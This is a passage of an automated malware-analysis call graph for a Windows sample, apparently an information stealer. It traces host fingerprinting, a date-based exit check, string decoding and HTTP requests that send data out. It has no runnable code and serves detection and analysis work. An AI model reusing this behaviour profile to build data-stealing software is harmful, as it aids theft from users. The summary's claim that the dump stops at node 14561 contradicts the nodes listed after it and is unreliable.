                            Host fingerprint: GetProcessHeap, RtlAllocateHeap, GetUserNameA (3c7850); GetProcessHeap, RtlAllocateHeap, GetComputerNameA (3c78e0); buffer assembly through 3ca9b0 (lstrlen, lstrcpy, lstrcat) and 3ca8a0 (lstrcpy).
                            Event loop at 3c6a89: OpenEventA (3c6ac2) -> 3c6ad9 -> CreateEventA (3c6ae1) -> 3c6b0c; or CloseHandle + Sleep (3c6af5) -> 3c6b0a and back to 3c6a89.
                            Date check at 3c6920: GetSystemTime -> string build (3c6820) -> sscanf (3c6998) -> 3ca800 -> SystemTimeToFileTime x2 (3c69aa) -> 3c69ce -> ExitProcess (3c69d8), or 3c69e0 -> 3c5b10.
                            3c5b10: lstrcpy / lstrlen buffer construction (3ca740, 3ca820, 3c6430); 3b26a0 (a second long run of 3b45c0 calls, ending at 3b45a9); 3c9c10 (bulk import resolution: "43 API calls" at 3c9c20, further GetProcAddress groups at 3ca0cc, 3ca21f, 3ca428, 3ca4ab, 3ca4e5, 3ca61b, 3ca686, 3ca6a7) -> 3c5ca3 -> 3b1590 (3b1670, lstrcpy) -> 3c5510.
                            3c5510: StrCmpCA at 3c5643, 3c56a0, 3c578a, 3c5856, 3c593f, 3c5a0b; Sleep at 3c5a16; sub-calls 3c51f0 ("20 API calls") and 3c52c0 ("25 API calls"); returns to 3c5cc3.
                            3c5cc3 onward: GetWindowsDirectoryA (3c7500); 3b4880; 3c17a0; 3b5960 ("34 API calls"); 3c1050; 3c0d90; 3c0f40; 3c1a10; GetProcessHeap, RtlAllocateHeap, InternetOpenA (3b4fb0); 3c0740; 3c1170.
                            The dump is cut off after node 14561.
3b1670 lstrcpy 14559->14561 14560->14554 14561->14552 14562->14554 14564 3c754c 14563->14564 14565 3c7553 GetVolumeInformationA 14563->14565 14564->14565 14566 3c7591 14565->14566 14567 3c75fc GetProcessHeap RtlAllocateHeap 14566->14567 14568 3c7628 wsprintfA 14567->14568 14569 3c7619 14567->14569 14571 3ca740 lstrcpy 14568->14571 14570 3ca740 lstrcpy 14569->14570 14572 3c5da7 14570->14572 14571->14572 14572->13636 14574 3ca7a0 lstrcpy 14573->14574 14575 3b4899 14574->14575 15625 3b47b0 14575->15625 14577 3b48a5 14578 3ca740 lstrcpy 14577->14578 14579 3b48d7 14578->14579 14580 3ca740 lstrcpy 14579->14580 14581 3b48e4 14580->14581 14582 3ca740 lstrcpy 14581->14582 14583 3b48f1 14582->14583 14584 3ca740 lstrcpy 14583->14584 14585 3b48fe 14584->14585 14586 3ca740 lstrcpy 14585->14586 14587 3b490b InternetOpenA StrCmpCA 14586->14587 14588 3b4944 14587->14588 14589 3b4ecb InternetCloseHandle 14588->14589 15631 3c8b60 14588->15631 14591 3b4ee8 14589->14591 15646 3b9ac0 CryptStringToBinaryA 14591->15646 14592 3b4963 15639 3ca920 14592->15639 14595 3b4976 14597 3ca8a0 lstrcpy 14595->14597 14602 3b497f 14597->14602 14598 3ca820 2 API calls 14599 3b4f05 14598->14599 14601 3ca9b0 4 API calls 14599->14601 14600 3b4f27 codecvt 14604 3ca7a0 lstrcpy 14600->14604 14603 3b4f1b 14601->14603 14606 3ca9b0 4 API calls 14602->14606 14605 3ca8a0 lstrcpy 14603->14605 14617 3b4f57 14604->14617 14605->14600 14607 3b49a9 14606->14607 14608 3ca8a0 lstrcpy 14607->14608 14609 3b49b2 14608->14609 14610 3ca9b0 4 API calls 14609->14610 14611 3b49d1 14610->14611 14612 3ca8a0 lstrcpy 14611->14612 14613 3b49da 14612->14613 14614 3ca920 3 API calls 14613->14614 14615 3b49f8 14614->14615 14616 3ca8a0 lstrcpy 14615->14616 14618 3b4a01 14616->14618 14617->13639 14619 3ca9b0 4 API calls 14618->14619 14620 3b4a20 14619->14620 14621 3ca8a0 lstrcpy 14620->14621 14622 3b4a29 14621->14622 14623 3ca9b0 4 API calls 14622->14623 14624 3b4a48 14623->14624 14625 3ca8a0 lstrcpy 14624->14625 14626 3b4a51 14625->14626 
14627 3ca9b0 4 API calls 14626->14627 14628 3b4a7d 14627->14628 14629 3ca920 3 API calls 14628->14629 14630 3b4a84 14629->14630 14631 3ca8a0 lstrcpy 14630->14631 14632 3b4a8d 14631->14632 14633 3b4aa3 InternetConnectA 14632->14633 14633->14589 14634 3b4ad3 HttpOpenRequestA 14633->14634 14636 3b4b28 14634->14636 14637 3b4ebe InternetCloseHandle 14634->14637 14638 3ca9b0 4 API calls 14636->14638 14637->14589 14639 3b4b3c 14638->14639 14640 3ca8a0 lstrcpy 14639->14640 14641 3b4b45 14640->14641 14642 3ca920 3 API calls 14641->14642 14643 3b4b63 14642->14643 14644 3ca8a0 lstrcpy 14643->14644 14645 3b4b6c 14644->14645 14646 3ca9b0 4 API calls 14645->14646 14647 3b4b8b 14646->14647 14648 3ca8a0 lstrcpy 14647->14648 14649 3b4b94 14648->14649 14650 3ca9b0 4 API calls 14649->14650 14651 3b4bb5 14650->14651 14652 3ca8a0 lstrcpy 14651->14652 14653 3b4bbe 14652->14653 14654 3ca9b0 4 API calls 14653->14654 14655 3b4bde 14654->14655 14656 3ca8a0 lstrcpy 14655->14656 14657 3b4be7 14656->14657 14658 3ca9b0 4 API calls 14657->14658 14659 3b4c06 14658->14659 14660 3ca8a0 lstrcpy 14659->14660 14661 3b4c0f 14660->14661 14662 3ca920 3 API calls 14661->14662 14663 3b4c2d 14662->14663 14664 3ca8a0 lstrcpy 14663->14664 14665 3b4c36 14664->14665 14666 3ca9b0 4 API calls 14665->14666 14667 3b4c55 14666->14667 14668 3ca8a0 lstrcpy 14667->14668 14669 3b4c5e 14668->14669 14670 3ca9b0 4 API calls 14669->14670 14671 3b4c7d 14670->14671 14672 3ca8a0 lstrcpy 14671->14672 14673 3b4c86 14672->14673 14674 3ca920 3 API calls 14673->14674 14675 3b4ca4 14674->14675 14676 3ca8a0 lstrcpy 14675->14676 14677 3b4cad 14676->14677 14678 3ca9b0 4 API calls 14677->14678 14679 3b4ccc 14678->14679 14680 3ca8a0 lstrcpy 14679->14680 14681 3b4cd5 14680->14681 14682 3ca9b0 4 API calls 14681->14682 14683 3b4cf6 14682->14683 14684 3ca8a0 lstrcpy 14683->14684 14685 3b4cff 14684->14685 14686 3ca9b0 4 API calls 14685->14686 14687 3b4d1f 14686->14687 14688 3ca8a0 lstrcpy 14687->14688 14689 3b4d28 14688->14689 14690 3ca9b0 4 
API calls 14689->14690 14691 3b4d47 14690->14691 14692 3ca8a0 lstrcpy 14691->14692 14693 3b4d50 14692->14693 14694 3ca920 3 API calls 14693->14694 14695 3b4d6e 14694->14695 14696 3ca8a0 lstrcpy 14695->14696 14697 3b4d77 14696->14697 14698 3ca740 lstrcpy 14697->14698 14699 3b4d92 14698->14699 14700 3ca920 3 API calls 14699->14700 14701 3b4db3 14700->14701 14702 3ca920 3 API calls 14701->14702 14703 3b4dba 14702->14703 14704 3ca8a0 lstrcpy 14703->14704 14705 3b4dc6 14704->14705 14706 3b4de7 lstrlen 14705->14706 14707 3b4dfa 14706->14707 14708 3b4e03 lstrlen 14707->14708 15645 3caad0 14708->15645 14710 3b4e13 HttpSendRequestA 14711 3b4e32 InternetReadFile 14710->14711 14712 3b4e67 InternetCloseHandle 14711->14712 14717 3b4e5e 14711->14717 14714 3ca800 14712->14714 14714->14637 14715 3ca9b0 4 API calls 14715->14717 14716 3ca8a0 lstrcpy 14716->14717 14717->14711 14717->14712 14717->14715 14717->14716 15652 3caad0 14718->15652 14720 3c17c4 StrCmpCA 14721 3c17cf ExitProcess 14720->14721 14723 3c17d7 14720->14723 14722 3c19c2 14722->13641 14723->14722 14724 3c185d StrCmpCA 14723->14724 14725 3c187f StrCmpCA 14723->14725 14726 3c1970 StrCmpCA 14723->14726 14727 3c18f1 StrCmpCA 14723->14727 14728 3c1951 StrCmpCA 14723->14728 14729 3c1932 StrCmpCA 14723->14729 14730 3c1913 StrCmpCA 14723->14730 14731 3c18ad StrCmpCA 14723->14731 14732 3c18cf StrCmpCA 14723->14732 14733 3ca820 lstrlen lstrcpy 14723->14733 14724->14723 14725->14723 14726->14723 14727->14723 14728->14723 14729->14723 14730->14723 14731->14723 14732->14723 14733->14723 14735 3ca7a0 lstrcpy 14734->14735 14736 3b5979 14735->14736 14737 3b47b0 2 API calls 14736->14737 14738 3b5985 14737->14738 14739 3ca740 lstrcpy 14738->14739 14740 3b59ba 14739->14740 14741 3ca740 lstrcpy 14740->14741 14742 3b59c7 14741->14742 14743 3ca740 lstrcpy 14742->14743 14744 3b59d4 14743->14744 14745 3ca740 lstrcpy 14744->14745 14746 3b59e1 14745->14746 14747 3ca740 lstrcpy 14746->14747 14748 3b59ee InternetOpenA StrCmpCA 14747->14748 14749 
3b5a1d 14748->14749 14750 3b5fc3 InternetCloseHandle 14749->14750 14752 3c8b60 3 API calls 14749->14752 14751 3b5fe0 14750->14751 14755 3b9ac0 4 API calls 14751->14755 14753 3b5a3c 14752->14753 14754 3ca920 3 API calls 14753->14754 14756 3b5a4f 14754->14756 14757 3b5fe6 14755->14757 14758 3ca8a0 lstrcpy 14756->14758 14759 3ca820 2 API calls 14757->14759 14761 3b601f codecvt 14757->14761 14763 3b5a58 14758->14763 14760 3b5ffd 14759->14760 14762 3ca9b0 4 API calls 14760->14762 14765 3ca7a0 lstrcpy 14761->14765 14764 3b6013 14762->14764 14767 3ca9b0 4 API calls 14763->14767 14766 3ca8a0 lstrcpy 14764->14766 14775 3b604f 14765->14775 14766->14761 14768 3b5a82 14767->14768 14769 3ca8a0 lstrcpy 14768->14769 14770 3b5a8b 14769->14770 14771 3ca9b0 4 API calls 14770->14771 14772 3b5aaa 14771->14772 14773 3ca8a0 lstrcpy 14772->14773 14774 3b5ab3 14773->14774 14776 3ca920 3 API calls 14774->14776 14775->13647 14777 3b5ad1 14776->14777 14778 3ca8a0 lstrcpy 14777->14778 14779 3b5ada 14778->14779 14780 3ca9b0 4 API calls 14779->14780 14781 3b5af9 14780->14781 14782 3ca8a0 lstrcpy 14781->14782 14783 3b5b02 14782->14783 14784 3ca9b0 4 API calls 14783->14784 14785 3b5b21 14784->14785 14786 3ca8a0 lstrcpy 14785->14786 14787 3b5b2a 14786->14787 14788 3ca9b0 4 API calls 14787->14788 14789 3b5b56 14788->14789 14790 3ca920 3 API calls 14789->14790 14791 3b5b5d 14790->14791 14792 3ca8a0 lstrcpy 14791->14792 14793 3b5b66 14792->14793 14794 3b5b7c InternetConnectA 14793->14794 14794->14750 14795 3b5bac HttpOpenRequestA 14794->14795 14797 3b5c0b 14795->14797 14798 3b5fb6 InternetCloseHandle 14795->14798 14799 3ca9b0 4 API calls 14797->14799 14798->14750 14800 3b5c1f 14799->14800 14801 3ca8a0 lstrcpy 14800->14801 14802 3b5c28 14801->14802 14803 3ca920 3 API calls 14802->14803 14804 3b5c46 14803->14804 14805 3ca8a0 lstrcpy 14804->14805 14806 3b5c4f 14805->14806 14807 3ca9b0 4 API calls 14806->14807 14808 3b5c6e 14807->14808 14809 3ca8a0 lstrcpy 14808->14809 14810 3b5c77 14809->14810 14811 
3ca9b0 4 API calls 14810->14811 14812 3b5c98 14811->14812 14813 3ca8a0 lstrcpy 14812->14813 14814 3b5ca1 14813->14814 14815 3ca9b0 4 API calls 14814->14815 14816 3b5cc1 14815->14816 14817 3ca8a0 lstrcpy 14816->14817 14818 3b5cca 14817->14818 14819 3ca9b0 4 API calls 14818->14819 14820 3b5ce9 14819->14820 14821 3ca8a0 lstrcpy 14820->14821 14822 3b5cf2 14821->14822 14823 3ca920 3 API calls 14822->14823 14824 3b5d10 14823->14824 14825 3ca8a0 lstrcpy 14824->14825 14826 3b5d19 14825->14826 14827 3ca9b0 4 API calls 14826->14827 14828 3b5d38 14827->14828 14829 3ca8a0 lstrcpy 14828->14829 14830 3b5d41 14829->14830 14831 3ca9b0 4 API calls 14830->14831 14832 3b5d60 14831->14832 14833 3ca8a0 lstrcpy 14832->14833 14834 3b5d69 14833->14834 14835 3ca920 3 API calls 14834->14835 14836 3b5d87 14835->14836 14837 3ca8a0 lstrcpy 14836->14837 14838 3b5d90 14837->14838 14839 3ca9b0 4 API calls 14838->14839 14840 3b5daf 14839->14840 14841 3ca8a0 lstrcpy 14840->14841 14842 3b5db8 14841->14842 14843 3ca9b0 4 API calls 14842->14843 14844 3b5dd9 14843->14844 14845 3ca8a0 lstrcpy 14844->14845 14846 3b5de2 14845->14846 14847 3ca9b0 4 API calls 14846->14847 14848 3b5e02 14847->14848 14849 3ca8a0 lstrcpy 14848->14849 14850 3b5e0b 14849->14850 14851 3ca9b0 4 API calls 14850->14851 14852 3b5e2a 14851->14852 14853 3ca8a0 lstrcpy 14852->14853 14854 3b5e33 14853->14854 14855 3ca920 3 API calls 14854->14855 14856 3b5e54 14855->14856 14857 3ca8a0 lstrcpy 14856->14857 14858 3b5e5d 14857->14858 14859 3b5e70 lstrlen 14858->14859 15653 3caad0 14859->15653 14861 3b5e81 lstrlen GetProcessHeap RtlAllocateHeap 15654 3caad0 14861->15654 14863 3b5eae lstrlen 14864 3b5ebe 14863->14864 14865 3b5ed7 lstrlen 14864->14865 14866 3b5ee7 14865->14866 14867 3b5ef0 lstrlen 14866->14867 14868 3b5f04 14867->14868 14869 3b5f1a lstrlen 14868->14869 15655 3caad0 14869->15655 14871 3b5f2a HttpSendRequestA 14872 3b5f35 InternetReadFile 14871->14872 14873 3b5f6a InternetCloseHandle 14872->14873 14877 3b5f61 14872->14877 
14873->14798 14875 3ca9b0 4 API calls 14875->14877 14876 3ca8a0 lstrcpy 14876->14877 14877->14872 14877->14873 14877->14875 14877->14876 14880 3c1077 14878->14880 14879 3c1151 14879->13649 14880->14879 14881 3ca820 lstrlen lstrcpy 14880->14881 14881->14880 14883 3c0db7 14882->14883 14884 3c0f17 14883->14884 14885 3c0ea4 StrCmpCA 14883->14885 14886 3c0e27 StrCmpCA 14883->14886 14887 3c0e67 StrCmpCA 14883->14887 14888 3ca820 lstrlen lstrcpy 14883->14888 14884->13657 14885->14883 14886->14883 14887->14883 14888->14883 14890 3c0f67 14889->14890 14891 3c1044 14890->14891 14892 3c0fb2 StrCmpCA 14890->14892 14893 3ca820 lstrlen lstrcpy 14890->14893 14891->13665 14892->14890 14893->14890 14895 3ca740 lstrcpy 14894->14895 14896 3c1a26 14895->14896 14897 3ca9b0 4 API calls 14896->14897 14898 3c1a37 14897->14898 14899 3ca8a0 lstrcpy 14898->14899 14900 3c1a40 14899->14900 14901 3ca9b0 4 API calls 14900->14901 14902 3c1a5b 14901->14902 14903 3ca8a0 lstrcpy 14902->14903 14904 3c1a64 14903->14904 14905 3ca9b0 4 API calls 14904->14905 14906 3c1a7d 14905->14906 14907 3ca8a0 lstrcpy 14906->14907 14908 3c1a86 14907->14908 14909 3ca9b0 4 API calls 14908->14909 14910 3c1aa1 14909->14910 14911 3ca8a0 lstrcpy 14910->14911 14912 3c1aaa 14911->14912 14913 3ca9b0 4 API calls 14912->14913 14914 3c1ac3 14913->14914 14915 3ca8a0 lstrcpy 14914->14915 14916 3c1acc 14915->14916 14917 3ca9b0 4 API calls 14916->14917 14918 3c1ae7 14917->14918 14919 3ca8a0 lstrcpy 14918->14919 14920 3c1af0 14919->14920 14921 3ca9b0 4 API calls 14920->14921 14922 3c1b09 14921->14922 14923 3ca8a0 lstrcpy 14922->14923 14924 3c1b12 14923->14924 14925 3ca9b0 4 API calls 14924->14925 14926 3c1b2d 14925->14926 14927 3ca8a0 lstrcpy 14926->14927 14928 3c1b36 14927->14928 14929 3ca9b0 4 API calls 14928->14929 14930 3c1b4f 14929->14930 14931 3ca8a0 lstrcpy 14930->14931 14932 3c1b58 14931->14932 14933 3ca9b0 4 API calls 14932->14933 14934 3c1b76 14933->14934 14935 3ca8a0 lstrcpy 14934->14935 14936 3c1b7f 14935->14936 14937 
3c7500 6 API calls 14936->14937 14938 3c1b96 14937->14938 14939 3ca920 3 API calls 14938->14939 14940 3c1ba9 14939->14940 14941 3ca8a0 lstrcpy 14940->14941 14942 3c1bb2 14941->14942 14943 3ca9b0 4 API calls 14942->14943 14944 3c1bdc 14943->14944 14945 3ca8a0 lstrcpy 14944->14945 14946 3c1be5 14945->14946 14947 3ca9b0 4 API calls 14946->14947 14948 3c1c05 14947->14948 14949 3ca8a0 lstrcpy 14948->14949 14950 3c1c0e 14949->14950 15656 3c7690 GetProcessHeap RtlAllocateHeap 14950->15656 14953 3ca9b0 4 API calls 14954 3c1c2e 14953->14954 14955 3ca8a0 lstrcpy 14954->14955 14956 3c1c37 14955->14956 14957 3ca9b0 4 API calls 14956->14957 14958 3c1c56 14957->14958 14959 3ca8a0 lstrcpy 14958->14959 14960 3c1c5f 14959->14960 14961 3ca9b0 4 API calls 14960->14961 14962 3c1c80 14961->14962 14963 3ca8a0 lstrcpy 14962->14963 14964 3c1c89 14963->14964 15663 3c77c0 GetCurrentProcess IsWow64Process 14964->15663 14967 3ca9b0 4 API calls 14968 3c1ca9 14967->14968 14969 3ca8a0 lstrcpy 14968->14969 14970 3c1cb2 14969->14970 14971 3ca9b0 4 API calls 14970->14971 14972 3c1cd1 14971->14972 14973 3ca8a0 lstrcpy 14972->14973 14974 3c1cda 14973->14974 14975 3ca9b0 4 API calls 14974->14975 14976 3c1cfb 14975->14976 14977 3ca8a0 lstrcpy 14976->14977 14978 3c1d04 14977->14978 14979 3c7850 3 API calls 14978->14979 14980 3c1d14 14979->14980 14981 3ca9b0 4 API calls 14980->14981 14982 3c1d24 14981->14982 14983 3ca8a0 lstrcpy 14982->14983 14984 3c1d2d 14983->14984 14985 3ca9b0 4 API calls 14984->14985 14986 3c1d4c 14985->14986 14987 3ca8a0 lstrcpy 14986->14987 14988 3c1d55 14987->14988 14989 3ca9b0 4 API calls 14988->14989 14990 3c1d75 14989->14990 14991 3ca8a0 lstrcpy 14990->14991 14992 3c1d7e 14991->14992 14993 3c78e0 3 API calls 14992->14993 14994 3c1d8e 14993->14994 14995 3ca9b0 4 API calls 14994->14995 14996 3c1d9e 14995->14996 14997 3ca8a0 lstrcpy 14996->14997 14998 3c1da7 14997->14998 14999 3ca9b0 4 API calls 14998->14999 15000 3c1dc6 14999->15000 15001 3ca8a0 lstrcpy 15000->15001 15002 3c1dcf 
15001->15002 15003 3ca9b0 4 API calls 15002->15003 15004 3c1df0 15003->15004 15005 3ca8a0 lstrcpy 15004->15005 15006 3c1df9 15005->15006 15665 3c7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15006->15665 15009 3ca9b0 4 API calls 15010 3c1e19 15009->15010 15011 3ca8a0 lstrcpy 15010->15011 15012 3c1e22 15011->15012 15013 3ca9b0 4 API calls 15012->15013 15014 3c1e41 15013->15014 15015 3ca8a0 lstrcpy 15014->15015 15016 3c1e4a 15015->15016 15017 3ca9b0 4 API calls 15016->15017 15018 3c1e6b 15017->15018 15019 3ca8a0 lstrcpy 15018->15019 15020 3c1e74 15019->15020 15667 3c7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15020->15667 15023 3ca9b0 4 API calls 15024 3c1e94 15023->15024 15025 3ca8a0 lstrcpy 15024->15025 15026 3c1e9d 15025->15026 15027 3ca9b0 4 API calls 15026->15027 15028 3c1ebc 15027->15028 15029 3ca8a0 lstrcpy 15028->15029 15030 3c1ec5 15029->15030 15031 3ca9b0 4 API calls 15030->15031 15032 3c1ee5 15031->15032 15033 3ca8a0 lstrcpy 15032->15033 15034 3c1eee 15033->15034 15670 3c7b00 GetUserDefaultLocaleName 15034->15670 15037 3ca9b0 4 API calls 15038 3c1f0e 15037->15038 15039 3ca8a0 lstrcpy 15038->15039 15040 3c1f17 15039->15040 15041 3ca9b0 4 API calls 15040->15041 15042 3c1f36 15041->15042 15043 3ca8a0 lstrcpy 15042->15043 15044 3c1f3f 15043->15044 15045 3ca9b0 4 API calls 15044->15045 15046 3c1f60 15045->15046 15047 3ca8a0 lstrcpy 15046->15047 15048 3c1f69 15047->15048 15674 3c7b90 15048->15674 15050 3c1f80 15051 3ca920 3 API calls 15050->15051 15052 3c1f93 15051->15052 15053 3ca8a0 lstrcpy 15052->15053 15054 3c1f9c 15053->15054 15055 3ca9b0 4 API calls 15054->15055 15056 3c1fc6 15055->15056 15057 3ca8a0 lstrcpy 15056->15057 15058 3c1fcf 15057->15058 15059 3ca9b0 4 API calls 15058->15059 15060 3c1fef 15059->15060 15061 3ca8a0 lstrcpy 15060->15061 15062 3c1ff8 15061->15062 15686 3c7d80 GetSystemPowerStatus 15062->15686 15065 3ca9b0 4 API calls 15066 3c2018 15065->15066 15067 3ca8a0 lstrcpy 15066->15067 15068 3c2021 15067->15068 15069 
3ca9b0 4 API calls 15068->15069 15070 3c2040 15069->15070 15071 3ca8a0 lstrcpy 15070->15071 15072 3c2049 15071->15072 15073 3ca9b0 4 API calls 15072->15073 15074 3c206a 15073->15074 15075 3ca8a0 lstrcpy 15074->15075 15076 3c2073 15075->15076 15077 3c207e GetCurrentProcessId 15076->15077 15688 3c9470 OpenProcess 15077->15688 15080 3ca920 3 API calls 15081 3c20a4 15080->15081 15082 3ca8a0 lstrcpy 15081->15082 15083 3c20ad 15082->15083 15084 3ca9b0 4 API calls 15083->15084 15085 3c20d7 15084->15085 15086 3ca8a0 lstrcpy 15085->15086 15087 3c20e0 15086->15087 15088 3ca9b0 4 API calls 15087->15088 15089 3c2100 15088->15089 15090 3ca8a0 lstrcpy 15089->15090 15091 3c2109 15090->15091 15693 3c7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15091->15693 15094 3ca9b0 4 API calls 15095 3c2129 15094->15095 15096 3ca8a0 lstrcpy 15095->15096 15097 3c2132 15096->15097 15098 3ca9b0 4 API calls 15097->15098 15099 3c2151 15098->15099 15100 3ca8a0 lstrcpy 15099->15100 15101 3c215a 15100->15101 15102 3ca9b0 4 API calls 15101->15102 15103 3c217b 15102->15103 15104 3ca8a0 lstrcpy 15103->15104 15105 3c2184 15104->15105 15697 3c7f60 15105->15697 15108 3ca9b0 4 API calls 15109 3c21a4 15108->15109 15110 3ca8a0 lstrcpy 15109->15110 15111 3c21ad 15110->15111 15112 3ca9b0 4 API calls 15111->15112 15113 3c21cc 15112->15113 15114 3ca8a0 lstrcpy 15113->15114 15115 3c21d5 15114->15115 15116 3ca9b0 4 API calls 15115->15116 15117 3c21f6 15116->15117 15118 3ca8a0 lstrcpy 15117->15118 15119 3c21ff 15118->15119 15710 3c7ed0 GetSystemInfo wsprintfA 15119->15710 15122 3ca9b0 4 API calls 15123 3c221f 15122->15123 15124 3ca8a0 lstrcpy 15123->15124 15125 3c2228 15124->15125 15126 3ca9b0 4 API calls 15125->15126 15127 3c2247 15126->15127 15128 3ca8a0 lstrcpy 15127->15128 15129 3c2250 15128->15129 15130 3ca9b0 4 API calls 15129->15130 15131 3c2270 15130->15131 15132 3ca8a0 lstrcpy 15131->15132 15133 3c2279 15132->15133 15712 3c8100 GetProcessHeap RtlAllocateHeap 15133->15712 15136 3ca9b0 4 API calls 15137 
3c2299 15136->15137 15138 3ca8a0 lstrcpy 15137->15138 15139 3c22a2 15138->15139 15140 3ca9b0 4 API calls 15139->15140 15141 3c22c1 15140->15141 15142 3ca8a0 lstrcpy 15141->15142 15143 3c22ca 15142->15143 15144 3ca9b0 4 API calls 15143->15144 15145 3c22eb 15144->15145 15146 3ca8a0 lstrcpy 15145->15146 15147 3c22f4 15146->15147 15718 3c87c0 15147->15718 15150 3ca920 3 API calls 15151 3c231e 15150->15151 15152 3ca8a0 lstrcpy 15151->15152 15153 3c2327 15152->15153 15154 3ca9b0 4 API calls 15153->15154 15155 3c2351 15154->15155 15156 3ca8a0 lstrcpy 15155->15156 15157 3c235a 15156->15157 15158 3ca9b0 4 API calls 15157->15158 15159 3c237a 15158->15159 15160 3ca8a0 lstrcpy 15159->15160 15161 3c2383 15160->15161 15162 3ca9b0 4 API calls 15161->15162 15163 3c23a2 15162->15163 15164 3ca8a0 lstrcpy 15163->15164 15165 3c23ab 15164->15165 15723 3c81f0 15165->15723 15167 3c23c2 15168 3ca920 3 API calls 15167->15168 15169 3c23d5 15168->15169 15170 3ca8a0 lstrcpy 15169->15170 15171 3c23de 15170->15171 15172 3ca9b0 4 API calls 15171->15172 15173 3c240a 15172->15173 15174 3ca8a0 lstrcpy 15173->15174 15175 3c2413 15174->15175 15176 3ca9b0 4 API calls 15175->15176 15177 3c2432 15176->15177 15178 3ca8a0 lstrcpy 15177->15178 15179 3c243b 15178->15179 15180 3ca9b0 4 API calls 15179->15180 15181 3c245c 15180->15181 15182 3ca8a0 lstrcpy 15181->15182 15183 3c2465 15182->15183 15184 3ca9b0 4 API calls 15183->15184 15185 3c2484 15184->15185 15186 3ca8a0 lstrcpy 15185->15186 15187 3c248d 15186->15187 15188 3ca9b0 4 API calls 15187->15188 15189 3c24ae 15188->15189 15190 3ca8a0 lstrcpy 15189->15190 15191 3c24b7 15190->15191 15731 3c8320 15191->15731 15193 3c24d3 15194 3ca920 3 API calls 15193->15194 15195 3c24e6 15194->15195 15196 3ca8a0 lstrcpy 15195->15196 15197 3c24ef 15196->15197 15198 3ca9b0 4 API calls 15197->15198 15199 3c2519 15198->15199 15200 3ca8a0 lstrcpy 15199->15200 15201 3c2522 15200->15201 15202 3ca9b0 4 API calls 15201->15202 15203 3c2543 15202->15203 15204 3ca8a0 lstrcpy 
15203->15204 15205 3c254c 15204->15205 15206 3c8320 17 API calls 15205->15206 15207 3c2568 15206->15207 15208 3ca920 3 API calls 15207->15208 15209 3c257b 15208->15209 15210 3ca8a0 lstrcpy 15209->15210 15211 3c2584 15210->15211 15212 3ca9b0 4 API calls 15211->15212 15213 3c25ae 15212->15213 15214 3ca8a0 lstrcpy 15213->15214 15215 3c25b7 15214->15215 15216 3ca9b0 4 API calls 15215->15216 15217 3c25d6 15216->15217 15218 3ca8a0 lstrcpy 15217->15218 15219 3c25df 15218->15219 15220 3ca9b0 4 API calls 15219->15220 15221 3c2600 15220->15221 15222 3ca8a0 lstrcpy 15221->15222 15223 3c2609 15222->15223 15767 3c8680 15223->15767 15225 3c2620 15226 3ca920 3 API calls 15225->15226 15227 3c2633 15226->15227 15228 3ca8a0 lstrcpy 15227->15228 15229 3c263c 15228->15229 15230 3c265a lstrlen 15229->15230 15231 3c266a 15230->15231 15232 3ca740 lstrcpy 15231->15232 15233 3c267c 15232->15233 15234 3b1590 lstrcpy 15233->15234 15235 3c268d 15234->15235 15777 3c5190 15235->15777 15237 3c2699 15237->13669 15965 3caad0 15238->15965 15240 3b5009 InternetOpenUrlA 15244 3b5021 15240->15244 15241 3b502a InternetReadFile 15241->15244 15242 3b50a0 InternetCloseHandle InternetCloseHandle 15243 3b50ec 15242->15243 15243->13673 15244->15241 15244->15242 15966 3b98d0 15245->15966 15247 3c0759 15248 3c077d 15247->15248 15249 3c0a38 15247->15249 15251 3c0799 StrCmpCA 15248->15251 15250 3b1590 lstrcpy 15249->15250 15252 3c0a49 15250->15252 15253 3c07a8 15251->15253 15254 3c0843 15251->15254 16142 3c0250 15252->16142 15256 3ca7a0 lstrcpy 15253->15256 15258 3c0865 StrCmpCA 15254->15258 15259 3c07c3 15256->15259 15260 3c0874 15258->15260 15297 3c096b 15258->15297 15261 3b1590 lstrcpy 15259->15261 15262 3ca740 lstrcpy 15260->15262 15263 3c080c 15261->15263 15265 3c0881 15262->15265 15266 3ca7a0 lstrcpy 15263->15266 15264 3c099c StrCmpCA 15267 3c09ab 15264->15267 15286 3c0a2d 15264->15286 15268 3ca9b0 4 API calls 15265->15268 15269 3c0823 15266->15269 15270 3b1590 lstrcpy 15267->15270 15271 3c08ac 
15268->15271 15272 3ca7a0 lstrcpy 15269->15272 15273 3c09f4 15270->15273 15274 3ca920 3 API calls 15271->15274 15275 3c083e 15272->15275 15276 3ca7a0 lstrcpy 15273->15276 15277 3c08b3 15274->15277 15969 3bfb00 15275->15969 15279 3c0a0d 15276->15279 15280 3ca9b0 4 API calls 15277->15280 15281 3ca7a0 lstrcpy 15279->15281 15282 3c08ba 15280->15282 15283 3c0a28 15281->15283 15284 3ca8a0 lstrcpy 15282->15284 16085 3c0030 15283->16085 15286->13677 15297->15264 15617 3ca7a0 lstrcpy 15616->15617 15618 3b1683 15617->15618 15619 3ca7a0 lstrcpy 15618->15619 15620 3b1695 15619->15620 15621 3ca7a0 lstrcpy 15620->15621 15622 3b16a7 15621->15622 15623 3ca7a0 lstrcpy 15622->15623 15624 3b15a3 15623->15624 15624->14500 15626 3b47c6 15625->15626 15627 3b4838 lstrlen 15626->15627 15651 3caad0 15627->15651 15629 3b4848 InternetCrackUrlA 15630 3b4867 15629->15630 15630->14577 15632 3ca740 lstrcpy 15631->15632 15633 3c8b74 15632->15633 15634 3ca740 lstrcpy 15633->15634 15635 3c8b82 GetSystemTime 15634->15635 15637 3c8b99 15635->15637 15636 3ca7a0 lstrcpy 15638 3c8bfc 15636->15638 15637->15636 15638->14592 15640 3ca931 15639->15640 15641 3ca988 15640->15641 15643 3ca968 lstrcpy lstrcat 15640->15643 15642 3ca7a0 lstrcpy 15641->15642 15644 3ca994 15642->15644 15643->15641 15644->14595 15645->14710 15647 3b4eee 15646->15647 15648 3b9af9 LocalAlloc 15646->15648 15647->14598 15647->14600 15648->15647 15649 3b9b14 CryptStringToBinaryA 15648->15649 15649->15647 15650 3b9b39 LocalFree 15649->15650 15650->15647 15651->15629 15652->14720 15653->14861 15654->14863 15655->14871 15784 3c77a0 15656->15784 15659 3c1c1e 15659->14953 15660 3c76c6 RegOpenKeyExA 15661 3c7704 RegCloseKey 15660->15661 15662 3c76e7 RegQueryValueExA 15660->15662 15661->15659 15662->15661 15664 3c1c99 15663->15664 15664->14967 15666 3c1e09 15665->15666 15666->15009 15668 3c7a9a wsprintfA 